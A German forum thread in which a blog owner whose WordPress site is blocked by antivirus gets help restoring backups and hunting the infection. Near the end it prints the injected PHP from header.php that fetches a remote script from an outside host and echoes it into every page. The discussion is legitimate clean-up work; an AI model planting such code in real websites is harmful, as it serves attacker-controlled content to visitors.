Virus beim Laden von Web-Inhalten gefunden.

  • Guten Tag Zusammen,

    seit heute morgen kann ich meinen Blog nicht mehr aufrufen da G-Data folgende Meldung bringt:

    Prüfung von Web-Inhalten:

    Virus: HTML:Script-inf (Engine B)

    Virus beim Laden von Web-Inhalten gefunden.

    Adresse: fb-designs.de
    Status: Der Zugriff wurde verweigert.

    Firefox sagt mir:

    Besitzer: Diese Website stellt keine Informationen über den Besitzer zur Verfügung.


    bis gestern Abend war noch alles wunderbar, seitdem habe ich nichts an der Website gemacht als ein backup der Datenbank zu erstellen.

    Kann mir irgendjemand sagen was das soll und wie ich mein Problem lösen kann?

    die Url der Website lautet http://www.fb-designs.de

    danke

    • Anzeige

    Hallo!

    Wenn du gerade an deiner Website arbeitest oder dein aktuelles Hosting überdenkst: Wir betreiben mit NetzLiving eine Hosting-Plattform, die speziell auf Performance, Sicherheit und einfache Verwaltung ausgelegt ist.

    • ✔️ Schnelle Ladezeiten (optimiert für WordPress & Co.)
    • ✔️ Deutsche Server & DSGVO-konform
    • ✔️ Persönlicher Support (kein 0815-Ticket-System)

    Mehr erfahren

  • Indem du die verseuchten Dateien scannst, bereinigst und die Sicherheitslücke schliesst oder einen Fachmann beauftragst

  • ich habe lokal alle Daten + Datenbank backup lokal liegen, gesichert wurde dies alles gestern noch als alles noch ohne Probleme lief. Ich habe die lokalen Daten mit G Data gescannt, demnach scheint auch alles in Ordnung zu sein. Kann ich nicht meine online Daten durch meine lokalen Daten ersetzten ?

    Was meinst du mit bereinigen, kann ich dies mit einem Programm bewerkstelligen oder müsste ich quasi jede Datei inhaltlich mit Originalen nicht infizierten Datein vergleichen und abweichendes löschen?

    wie kann sowas überhaupt passieren? grundlegend müsste ich ja die Sicherheitslücke erstmal schließen, das einzigste was mir hierzu einfällt wäre ein infiziertes FTP Programm.

    danke

  • Natürlich kannst du dein letztes, bereinigtes Backup einspielen. Jedoch musst du dann auch die Sicherheitslücke finden und schliessen. Auch alle PW's ändern.
    Mit Bereinigen meine ich die Malware zu entfernen.

  • hm also ich habe mein gescanntes backup überspielt die Website ist aber nach wie vor gesperrt? Pw wie Ftp Programm wurde gewechselt. Kannst du dir darauf einen Reim machen? Kann es sein das die Seite bei G Data temporär immernoch gesperrt ist?

  • Das wäre alles nicht so tragisch wenn ich die Website nicht aktuell zur Bewerbung benötigen würde, aber is typisch so ne scheisse passiert mir immer ^^

  • gibts da wenn du die virenmeldung hast einen link zum "erneutes überprüfen der webseite" oder so??
    Wenn du ein sauberes backup eingespielt hast, sollte es ein temp problem sein.

    konntest du schon die sicherheitslücke finden? verwendest du alte plugin oder gibt es die timthumb.php in einem deiner themes?

    Digitaler Rucksack Nomade

  • Einen Refresh button gibt es nicht zum erneuten überprüfen. Wie du im nachstehenden Beitrag ja aber sagtest ist die Seite sowieso noch verseucht nur versteh ich das richtig und die versuchte Datei liegt gar nicht bei mir auf dem Webspace sondern auf diese wird einfach nur verwiesen?

    Eine Idee wie ich am besten vorgehen könnte um diesen Verweis zu finden? Ohne das ich jede einzelene Datei nach diesem Link durchsuchen zu müssen ?

  • der schadecode befindet sich nicht auf deinem server richtig, aber irgendwo muss der verweis ja herkommen und dementsprechnd ist davon auszugehen dass du gehackt wurdest oder halt diese jquery seite...

    versuchs mal in der header.php, ansonsten einfach alle dateien auf einmal durchsuchen ( zb mit notepad++)

    Digitaler Rucksack Nomade

  • ok ganz dumme Frage aber wie kann ich mit notepad mehr als eine Datei durchsuchen? Ich hätte alternativ auch den Dreamwaever zur Verfügung.

    danke

  • also ich habe in der header.php und sonst nirgends folgenden verweis gefunden:

    <?php if(function_exists('curl_init')) { $url = "http://www.wpstats.org/jquery-1.6.3.min.js"; $ch = curl_init(); $timeout = 5; curl_setopt($ch,CURLOPT_URL,$url); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout); $data = curl_exec($ch); curl_close($ch); echo "$data"; } ?>


    soll ich den kompletten part einfach löschen?

    danke dir

  • ja bitte entfernen, durchsuch die anderen dateinen auch nochmal nach curl und komsichen abfragen,
    ansonsten: hast du schon die lücke in deinem blog gefunden? gibt es eine timthumb.php? hast du weitere php scripte auf dem gleichen webspace?

    Digitaler Rucksack Nomade

  • also eine timthumb.php gibt es nicht, ich hab den kompletten webspace eben platt gemacht und dann mein backup wieder aufgespielt, anschließend habe ich den verweiss entfernt, seltsam ist nur das die Seite auch schon davor wieder ging ^^ Wo jetzt aber wirklich die Sicherheitslücke liegt bleibt ein Fragezeichen. Ich habe nur Wordpress auf die aktuelle Version geupdatet, mein Ftp Programm gewechselt und Passwörter bezüglich des Webspac verändert.

Jetzt mitmachen!

Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!